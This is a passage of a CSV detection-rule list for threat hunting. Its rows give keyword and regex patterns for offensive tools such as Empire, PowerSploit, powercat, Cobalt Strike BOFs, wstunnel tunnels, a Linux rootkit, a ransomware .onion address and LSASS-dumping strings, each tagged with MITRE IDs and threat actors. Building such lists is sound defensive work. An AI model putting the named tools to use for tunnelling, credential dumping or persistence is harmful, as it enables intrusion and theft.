"*Write-ServiceBinary*",".{0,1000}Write\-ServiceBinary.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation 
tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63091" "*Write-ServiceEXE *",".{0,1000}Write\-ServiceEXE\s.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63092" 
"*Write-ServiceEXECMD*",".{0,1000}Write\-ServiceEXECMD.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63093" "*Write-UserAddMSI*",".{0,1000}Write\-UserAddMSI.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to 
aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","63094" "*Write-UserAddServiceBinary*",".{0,1000}Write\-UserAddServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63095" "*Write-Verbose (""Listening on [0.0.0.0] port*",".{0,1000}Write\-Verbose\s\(\""Listening\son\s\[0\.0\.0\.0\]\sport.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","63096" "*writing-rootkit.txt*",".{0,1000}writing\-rootkit\.txt.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - 
T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","63097" "*Written by anthemtotheego & g0ldengunsec*",".{0,1000}Written\sby\santhemtotheego\s\&\sg0ldengunsec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","63098" "*ws://127.0.0.1:1339/yolo*",".{0,1000}ws\:\/\/127\.0\.0\.1\:1339\/yolo.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","63099" "*ws://localhost:58082*",".{0,1000}ws\:\/\/localhost\:58082.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","63100" "*WSAAcceptBackdoor-master.zip*",".{0,1000}WSAAcceptBackdoor\-master\.zip.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","63101" "*wscript_elevator*",".{0,1000}wscript_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","63102" 
"*WScriptBypassUAC*",".{0,1000}WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63103" "*wsl kali-linux*",".{0,1000}wsl\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","63104" "*WSPCoerce.ex*",".{0,1000}WSPCoerce\.ex.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","63105" "*WSPCoerce-main*",".{0,1000}WSPCoerce\-main.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","63106" "*wstunnel client *",".{0,1000}wstunnel\sclient\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63109" "*wstunnel server *",".{0,1000}wstunnel\sserver\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63110" 
"*wstunnel* --restrict-to 127.0.0.1:22*",".{0,1000}wstunnel.{0,1000}\s\-\-restrict\-to\s127\.0\.0\.1\:22.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63111" "*wstunnel*cert.pem*",".{0,1000}wstunnel.{0,1000}cert\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63112" "*wstunnel*key.pem*",".{0,1000}wstunnel.{0,1000}key\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63113" "*wstunnel.exe *",".{0,1000}wstunnel\.exe\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63114" "*wstunnel/pkgs/container/wstunnel*",".{0,1000}wstunnel\/pkgs\/container\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - 
T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63115" "*wstunnel_*_darwin_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63116" "*wstunnel_*_linux_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63117" "*wstunnel_*_linux_arm64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_arm64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63118" "*wstunnel_*_linux_armv7.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_armv7\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data 
Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63119" "*wstunnel_*_windows_386.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_386\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63120" "*wstunnel_*_windows_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63121" "*WSUSpendu*",".{0,1000}WSUSpendu.{0,1000}","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","63122" "*wsuxploit*",".{0,1000}wsuxploit.{0,1000}","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. 
It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","N/A","3","284","45","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z","63123" "*wts_enum_remote_processes*",".{0,1000}wts_enum_remote_processes.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","63124" "*wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA=*",".{0,1000}wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","63125" "*wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion*",".{0,1000}wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63126" "*wumb0/rust_bof*",".{0,1000}wumb0\/rust_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","63127" "*WwAhAF0AIABJAG4ALQBtAGUAbQBvAHIAeQAgAEwAUwBBAFMAUwAgAGQAdQBtAHAAIABtAGUAdABoAG8AZAAgAGYAYQBpAGwAZQBkADoAIAAkAF8A*",".{0,1000}WwAhAF0AIABJAG4ALQBtAGUAbQBvAHIAeQAgAEwAUwBBAFMAUwAgAGQAdQBtAHAAIABtAGUAdABoAG8AZAAgAGYAYQBpAGwAZQBkADoAIAAkAF8A.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63128" "*WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQAIAB1AHMAaQBuAGcAIABzAHQAZQBhAGwAdABoACAAbQBlAHQAaABvAGQALgA=*",".{0,1000}WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQAIAB1AHMAaQBuAGcAIABzAHQAZQBhAGwAdABoACAAbQBlAHQAaABvAGQALgA\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping 
